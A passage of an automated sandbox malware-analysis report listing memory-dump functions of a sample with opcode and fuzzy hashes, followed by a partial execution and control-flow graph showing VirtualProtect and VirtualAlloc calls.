                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction ID: f0cd4c5949e007dfb337b2a0df2b9340da400600cc0c9508ea392d2325d53a42
                                                                                                                                      • Opcode Fuzzy Hash: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction Fuzzy Hash: 25F06D3050A68DCFCF95DF18C865A9A3FE0FF29340F0501A6E418C75A6D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CB2A9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction ID: dbb5e94b4afeafcadb94eff081683a56e029ed68a3bbbf9b277fee56d2bd1c39
                                                                                                                                      • Opcode Fuzzy Hash: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction Fuzzy Hash: 57F0F67190A68D8FEB11BBA048692F87BB0FF15300F4548F7E41CC21E3ED281144C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C4586 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27a8cc295494a35e392f1980b471b2fa826766d0975f86cfae6add84fdaeaed9
                                                                                                                                      • Instruction ID: 190146ce7154272e2c86fb45b111149441a130f87f4e29fcc6cb44908a22fcd7
                                                                                                                                      • Opcode Fuzzy Hash: 27a8cc295494a35e392f1980b471b2fa826766d0975f86cfae6add84fdaeaed9
                                                                                                                                      • Instruction Fuzzy Hash: 1401F670A0550CCFEB64EF84C494BA8B7B1FB59315F1541AAC419EB2A1CB75A981CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896155 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a16cec989d92885b35b29c1bb39ef7e243df487bd9cb1cc11058f1cb72ece7fe
                                                                                                                                      • Instruction ID: 3af38cc812678bf5c2d8df3223d8b439c228c85fee6866940ae374cf63b0217f
                                                                                                                                      • Opcode Fuzzy Hash: a16cec989d92885b35b29c1bb39ef7e243df487bd9cb1cc11058f1cb72ece7fe
                                                                                                                                      • Instruction Fuzzy Hash: FDF0BE7092968D8FDB55EF6898A86ED7FF0FF09300F4100AAE818C21A2DA349694C701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9D59 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction ID: 146f51af0ea56b3cf4e94149412cccdb2974714daba32c4b057c8338e7a27461
                                                                                                                                      • Opcode Fuzzy Hash: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0547191978C9FDB52AF7488686E97FF0FF15200F4604E7E418C71B2DA349654C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896105 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction ID: 37c4e285f216517c9e48b90ec61dd197cfa2dac02dd6b188a8309e5e7aece153
                                                                                                                                      • Opcode Fuzzy Hash: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction Fuzzy Hash: 74F08C7194A68D9FDB91ABA488A969D7FB0FF18300F4506BBD448C61A2DA3492948701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89664D Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction ID: 0780af3514576b6cf5bdcb99d851e067e45723f2029fbc2018b7df116e2f2530
                                                                                                                                      • Opcode Fuzzy Hash: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction Fuzzy Hash: 14F05C70E4D10A9EDB05DF94A4624FDBB60DF46300F204479D81CD31D7DD3412418681
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF692 Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8f38399c9587083963bd39588892ada1bfc175cbf6a75f7d1f39ae575bfa6e33
                                                                                                                                      • Instruction ID: 9d235ee4f2a094e0ca4558a1621288bb1bfc98cebb18c210401cc3bce4706ba4
                                                                                                                                      • Opcode Fuzzy Hash: 8f38399c9587083963bd39588892ada1bfc175cbf6a75f7d1f39ae575bfa6e33
                                                                                                                                      • Instruction Fuzzy Hash: 0EF0EC70E0550E8FEB14EF84C4647FC77F1AB5C319F15413AC015A62E5CB79A988CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D0115 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction ID: d8cdbc9fa8ab1dd57462dd35c568cd550ea0f0b09558d317de7ffdb5c814b746
                                                                                                                                      • Opcode Fuzzy Hash: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction Fuzzy Hash: 1EE0923195E38D8FDB269F7088665D93FA0FF45304F0606BAD458461E6EA68AA24C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA1DD Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction ID: 16c3ed72f3c4d39044c099b7ed734c8d44601ef8a3dfe3f04e9aba38f69960f5
                                                                                                                                      • Opcode Fuzzy Hash: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction Fuzzy Hash: 9CF0A07091A28D9FDB51EF608A206ED77B0FF05300F4504E6E028C32A2DB389618D741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B882171 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5e8dac8b83107ab6847c04596a4e2b938851480953b14e466de1b5f81d4636d8
                                                                                                                                      • Instruction ID: 388c4e95da2c00ad05a3f67d71a22651abed6ef2e4a2e3e92c8c9849506c1a68
                                                                                                                                      • Opcode Fuzzy Hash: 5e8dac8b83107ab6847c04596a4e2b938851480953b14e466de1b5f81d4636d8
                                                                                                                                      • Instruction Fuzzy Hash: 3EF0DA74A1991E8BE7A4EB18CC646E867B1EF99344F0041B5901D935A5CE346D818B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89E2AA Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction ID: abf02cccf1b7f8c885843eab26038be62658b2b2a60f9951619bf0f29e0ff77e
                                                                                                                                      • Opcode Fuzzy Hash: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction Fuzzy Hash: 87F0DA30E4915E8EFFB09BE484583ACBFB0AF1C302F22407AE40DD65A5DA3866848F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF57D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6f81463f7a2e9f825a113a7a88991d6316b478f20fa9cdcc3011a3d3d237d4b5
                                                                                                                                      • Instruction ID: 6e4da8eb7397fede2c7ce1bbb73194ce529fd4ce6d2780465d9b591e121a0607
                                                                                                                                      • Opcode Fuzzy Hash: 6f81463f7a2e9f825a113a7a88991d6316b478f20fa9cdcc3011a3d3d237d4b5
                                                                                                                                      • Instruction Fuzzy Hash: 41F0F870A0450E8FEB14EF84C4A47F877B1EB58329F18413AC415AB2E5DBB9A988CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C9C9D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 44a762afeeb72ae9ba02acf7449e9074413ad9c009f77fe0c3f124f26869f27d
                                                                                                                                      • Instruction ID: ce303e964bad7094d92eb280d25b7c18d1222b1bfce6ad8472d30ae738133a81
                                                                                                                                      • Opcode Fuzzy Hash: 44a762afeeb72ae9ba02acf7449e9074413ad9c009f77fe0c3f124f26869f27d
                                                                                                                                      • Instruction Fuzzy Hash: 2EF0F870A0411D8FEB55EF80D8587F973B2FB59324F10077AC409A7291DB7D6684CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88A1E2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 2a9cce8ef03432b02c27bed38e24ea2f9db93362f2a2681169a626367e4c1cc5
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: B0F0D470D0A62D8FFBB4AB64C968BE9B6B0EF58300F1100F8C15DA2391DE395AC4CE01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89D94E Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 32800ad6ce477599dfd393618f9c508542fd560ca02dcff1391c1cbd84889bd9
                                                                                                                                      • Instruction ID: 0cb64d81690368673b2e5b24bc5cd07c33d05ae74f8965df8604ddfc4ac8917c
                                                                                                                                      • Opcode Fuzzy Hash: 32800ad6ce477599dfd393618f9c508542fd560ca02dcff1391c1cbd84889bd9
                                                                                                                                      • Instruction Fuzzy Hash: BCE04F61A0460E8BEB54DF48C8915AD6BF1EF44200F400135C41D871D5DE342442C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B89014E Relevance: .3, Instructions: 294COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af886188ca49f9c4123906f7a95bdec3579ecec1743abdd3a5c9198fab7e7741
                                                                                                                                      • Instruction ID: 9dd2670e9fbf4afd677a33cb667a5b934dc87b6e583e80cca4961014ff981008
                                                                                                                                      • Opcode Fuzzy Hash: af886188ca49f9c4123906f7a95bdec3579ecec1743abdd3a5c9198fab7e7741
                                                                                                                                      • Instruction Fuzzy Hash: D491D330919A8D8FEFA9DF58C855BE97BE0FF59310F00412AE84DC7292DB749585CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C8355 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c0dec6bb621d02f09ca37c26eb6df427116b4d6875f8c58feacb3f118b1b1ca3
                                                                                                                                      • Instruction ID: d394d629e71dbd53243c04d4860ae5442db21f5b9a5187340f271251a2e6e44b
                                                                                                                                      • Opcode Fuzzy Hash: c0dec6bb621d02f09ca37c26eb6df427116b4d6875f8c58feacb3f118b1b1ca3
                                                                                                                                      • Instruction Fuzzy Hash: 9631CDA684E7C14FD7139B70AD615A03FB1AF27255B0F06DBC0C08F4A3E6581A5AC732
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894E90 Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction ID: e8f7a8636b4bd24637bff69abf59f12d483bff6b92003487f846a2a6bb2f06c9
                                                                                                                                      • Opcode Fuzzy Hash: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction Fuzzy Hash: CE21F330E06A2D8FEBB9DF54C8947E9BBB5EB49301F1041E9C00DA2291DB746B888F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 15933 7ffd9b8903fe 15934 7ffd9b89040d VirtualProtect 15933->15934 15936 7ffd9b89054d 15934->15936 15929 7ffd9b891ae1 15930 7ffd9b891aff 15929->15930 15931 7ffd9b891efd VirtualAlloc 15930->15931 15932 7ffd9b891f55 15931->15932

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B899FAF Relevance: 5.1, Strings: 3, Instructions: 1359COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 7ffd9b899faf-7ffd9b89a15c 15 7ffd9b89a882-7ffd9b89a88f 0->15 16 7ffd9b89a895-7ffd9b89a8d7 15->16 17 7ffd9b89a161-7ffd9b89a16f 15->17 25 7ffd9b89a994-7ffd9b89a99a 16->25 19 7ffd9b89a176-7ffd9b89a25c 17->19 20 7ffd9b89a171 17->20 41 7ffd9b89a25e-7ffd9b89a287 19->41 42 7ffd9b89a28d-7ffd9b89a2e7 19->42 20->19 27 7ffd9b89a8dc-7ffd9b89a939 25->27 28 7ffd9b89a9a0-7ffd9b89a9e2 25->28 39 7ffd9b89a966-7ffd9b89a991 27->39 40 7ffd9b89a93b-7ffd9b89a93f 27->40 38 7ffd9b89ac04-7ffd9b89ac0a 28->38 43 7ffd9b89a9e7-7ffd9b89ab2f 38->43 44 7ffd9b89ac10-7ffd9b89ac69 38->44 39->25 40->39 45 7ffd9b89a941-7ffd9b89a963 40->45 41->42 60 7ffd9b89a2f6-7ffd9b89a34b 42->60 61 7ffd9b89a2e9-7ffd9b89a2f1 42->61 94 7ffd9b89ab95-7ffd9b89ab99 43->94 95 7ffd9b89ab31-7ffd9b89ab93 43->95 54 7ffd9b89acf8-7ffd9b89ad06 44->54 55 7ffd9b89ac6f-7ffd9b89acbb 44->55 45->39 59 7ffd9b89ad0d-7ffd9b89ad4f 54->59 55->54 74 7ffd9b89b137-7ffd9b89b13d 59->74 79 7ffd9b89a35a-7ffd9b89a3af 60->79 80 7ffd9b89a34d-7ffd9b89a355 60->80 64 7ffd9b89a86d-7ffd9b89a87f 61->64 64->15 77 7ffd9b89ad54-7ffd9b89add4 74->77 78 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 74->78 97 7ffd9b89add6-7ffd9b89ade2 77->97 98 7ffd9b89ae04-7ffd9b89ae13 77->98 106 7ffd9b89b179-7ffd9b89b187 78->106 100 7ffd9b89a3be-7ffd9b89a413 79->100 101 7ffd9b89a3b1-7ffd9b89a3b9 79->101 80->64 104 7ffd9b89ab9b-7ffd9b89abcd 94->104 105 7ffd9b89abcf-7ffd9b89abe2 94->105 120 7ffd9b89abe3-7ffd9b89ac01 95->120 107 7ffd9b89ae31-7ffd9b89ae39 97->107 108 7ffd9b89ade4-7ffd9b89adf9 97->108 102 7ffd9b89ae15 98->102 103 7ffd9b89ae1a-7ffd9b89ae29 98->103 135 7ffd9b89a415-7ffd9b89a41d 100->135 136 7ffd9b89a422-7ffd9b89a477 100->136 101->64 102->103 110 7ffd9b89ae2b-7ffd9b89ae2c 103->110 111 7ffd9b89ae3e-7ffd9b89ae59 103->111 104->120 105->120 112 7ffd9b89b192-7ffd9b89b21b 106->112 115 7ffd9b89b116-7ffd9b89b134 107->115 108->98 110->107 116 7ffd9b89ae79-7ffd9b89b0dd 111->116 117 7ffd9b89ae5b-7ffd9b89ae75 111->117 138 7ffd9b89b221-7ffd9b89b2aa 112->138 139 7ffd9b89b2b3-7ffd9b89b2d5 112->139 115->74 127 7ffd9b89b12c-7ffd9b89b134 116->127 128 7ffd9b89b0df-7ffd9b89b10b 116->128 117->116 120->38 127->74 128->115 135->64 152 7ffd9b89a486-7ffd9b89a4db 136->152 153 7ffd9b89a479-7ffd9b89a481 136->153 138->139 163 7ffd9b89b2ac 138->163 144 7ffd9b89b426-7ffd9b89b4bc 139->144 145 7ffd9b89b2db-7ffd9b89b326 139->145 169 7ffd9b89b57f-7ffd9b89b5c5 144->169 170 7ffd9b89b4c2-7ffd9b89b4ce 144->170 159 7ffd9b89b40d-7ffd9b89b41a 145->159 178 7ffd9b89a4ea-7ffd9b89a53f 152->178 179 7ffd9b89a4dd-7ffd9b89a4e5 152->179 153->64 161 7ffd9b89b32b-7ffd9b89b339 159->161 162 7ffd9b89b420-7ffd9b89b421 159->162 164 7ffd9b89b33b 161->164 165 7ffd9b89b340-7ffd9b89b3a2 161->165 168 7ffd9b89b734-7ffd9b89b793 162->168 163->139 164->165 176 7ffd9b89b3a9-7ffd9b89b3fb 165->176 177 7ffd9b89b3a4 165->177 189 7ffd9b89ba5b-7ffd9b89ba88 168->189 191 7ffd9b89b5cc-7ffd9b89b5d2 169->191 180 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 170->180 181 7ffd9b89b4d0-7ffd9b89b51c 170->181 205 7ffd9b89b405-7ffd9b89b40a 176->205 206 7ffd9b89b3fd-7ffd9b89b402 176->206 177->176 207 7ffd9b89a54e-7ffd9b89a5a3 178->207 208 7ffd9b89a541-7ffd9b89a549 178->208 179->64 180->191 181->180 203 7ffd9b89b798-7ffd9b89b7d4 189->203 204 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 189->204 195 7ffd9b89b721-7ffd9b89b72e 191->195 195->168 198 7ffd9b89b5d7-7ffd9b89b5e5 195->198 199 7ffd9b89b5e7 198->199 200 7ffd9b89b5ec-7ffd9b89b646 198->200 199->200 220 7ffd9b89b6b6-7ffd9b89b6de 200->220 221 7ffd9b89b648-7ffd9b89b670 200->221 215 7ffd9b89b7d6-7ffd9b89b7ed 203->215 216 7ffd9b89b7f1-7ffd9b89ba58 203->216 228 7ffd9b89babb-7ffd9b89baef 204->228 229 7ffd9b89bab4 204->229 205->159 206->205 236 7ffd9b89a5a5-7ffd9b89a5ad 207->236 237 7ffd9b89a5b2-7ffd9b89a607 207->237 208->64 215->216 216->189 224 7ffd9b89b6e5-7ffd9b89b70e 220->224 225 7ffd9b89b6e0 220->225 226 7ffd9b89b677-7ffd9b89b6b4 221->226 227 7ffd9b89b672 221->227 242 7ffd9b89b719-7ffd9b89b71e 224->242 